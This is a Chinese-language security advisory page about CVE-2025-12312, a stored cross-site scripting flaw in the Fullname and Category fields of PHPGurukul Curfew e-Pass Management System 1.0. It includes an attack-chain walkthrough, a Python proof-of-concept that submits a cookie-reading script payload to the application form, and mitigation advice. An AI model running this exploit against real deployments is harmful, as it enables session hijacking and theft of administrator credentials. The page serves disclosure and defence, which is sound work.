IPBUF安全漏洞报告
English
CVE-2025-12312 CVSS 2.4 低危

CVE-2025-12312 PHPGurukul Curfew e-Pass Management System 1.0 跨站脚本漏洞

披露日期: 2025-10-27
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-12312
漏洞类型
跨站脚本攻击 (XSS)
CVSS评分
2.4 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
需要交互 (UI:R)
影响产品
PHPGurukul Curfew e-Pass Management System 1.0

相关标签

CVE-2025-12312XSS跨站脚本Stored XSSPHPGurukulCurfew e-PassWeb应用安全CVE-2025

漏洞概述

PHPGurukul Curfew e-Pass Management System 1.0版本中存在存储型跨站脚本(Stored XSS)漏洞。该漏洞位于view-pass-detail.php文件中,攻击者可以通过Fullname和Category参数注入恶意JavaScript代码。由于该系统是电子通行证管理系统,攻击者可能利用此漏洞窃取管理员或用户的会话cookie、凭据或其他敏感信息。虽然该漏洞的CVSS评分为2.4(低危级别),但攻击者一旦成功利用,可能导致用户账户被劫持、敏感数据泄露等安全问题。漏洞的利用需要高权限用户交互,但远程攻击者可以构造恶意payload并诱导管理员查看。

技术细节

该漏洞是典型的存储型XSS(Stored XSS)漏洞,存在于Curfew e-Pass Management System的view-pass-detail.php页面。攻击者通过在通行证申请表单的Fullname或Category字段中注入恶意JavaScript代码(如<script>alert(document.cookie)</script>),系统未对这些输入进行充分的过滤和编码,直接将数据存储在数据库中。当管理员或其他用户通过view-pass-detail.php页面查看通行证详情时,恶意脚本会被浏览器执行,从而实现会话劫持、敏感信息窃取等攻击。由于CVSS向量显示需要高权限(PR:H)和用户交互(UI:R),攻击者可能需要先获取一定的系统访问权限才能提交恶意数据,但一旦注入成功,所有查看该记录的用户都会受到影响。

攻击链分析

STEP 1
信息收集
攻击者识别目标系统为PHPGurukul Curfew e-Pass Management System 1.0,确认存在view-pass-detail.php页面
STEP 2
构造恶意Payload
攻击者构造XSS payload,如<script>alert(document.cookie)</script>,准备注入到Fullname或Category参数中
STEP 3
提交恶意数据
攻击者通过通行证申请表单提交包含恶意脚本的数据,系统未进行输入过滤直接将数据存储到数据库
STEP 4
诱导管理员访问
攻击者诱导具有高权限的管理员访问view-pass-detail.php页面查看通行证详情
STEP 5
XSS执行
当管理员查看详情时,恶意JavaScript代码在管理员浏览器中执行,可窃取会话cookie、凭据或其他敏感信息
STEP 6
账户劫持
攻击者利用窃取的会话信息劫持管理员账户,获取系统完全控制权限

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import sys # CVE-2025-12312 PoC - Stored XSS in PHPGurukul Curfew e-Pass Management System 1.0 # Target: view-pass-detail.php # Vulnerable Parameter: Fullname / Category TARGET_URL = "http://target.com/curfew-pass-management-system/" # XSS Payload xss_payload = '<script>alert(document.cookie)</script>' def exploit_xss(): """ Exploit Stored XSS vulnerability in Curfew e-Pass Management System Attack Vector: Inject XSS payload in Fullname or Category parameter """ print(f"[*] Targeting: {TARGET_URL}") print(f"[*] XSS Payload: {xss_payload}") # Step 1: Submit malicious data through pass application form # The vulnerable endpoint typically processes pass applications submit_url = f"{TARGET_URL}apply-pass.php" data = { 'fullname': xss_payload, # XSS injection point 1 'category': xss_payload, # XSS injection point 2 # Other required form fields 'aadhar': '123456789012', 'email': '[email protected]', 'phone': '1234567890', 'address': 'Test Address', 'reason': 'Emergency travel' } try: print("[*] Step 1: Submitting malicious pass application...") response = requests.post(submit_url, data=data, timeout=10) print(f"[+] Application submitted with status: {response.status_code}") # Step 2: Trigger XSS when admin views pass details # The vulnerable page is view-pass-detail.php view_url = f"{TARGET_URL}admin/view-pass-detail.php?id=1" print(f"[*] Step 2: Accessing vulnerable page: {view_url}") print("[+] XSS will be triggered when viewing pass details") print("[+] Attacker can steal cookies, session tokens, etc.") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False return True if __name__ == "__main__": print("=" * 60) print("CVE-2025-12312 - PHPGurukul Curfew e-Pass XSS Exploit") print("=" * 60) exploit_xss()

影响范围

PHPGurukul Curfew e-Pass Management System 1.0

防御指南

临时缓解措施
在修复前,可采取以下临时缓解措施:1) 在Web应用防火墙(WAF)上配置XSS防护规则,过滤恶意请求;2) 限制view-pass-detail.php页面的访问权限,仅允许必要的管理员访问;3) 对所有用户输入实施严格的输入验证和输出编码;4) 监控应用日志,检测异常的XSS攻击尝试;5) 提醒管理员不要点击来源不明的链接,减少被钓鱼攻击的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表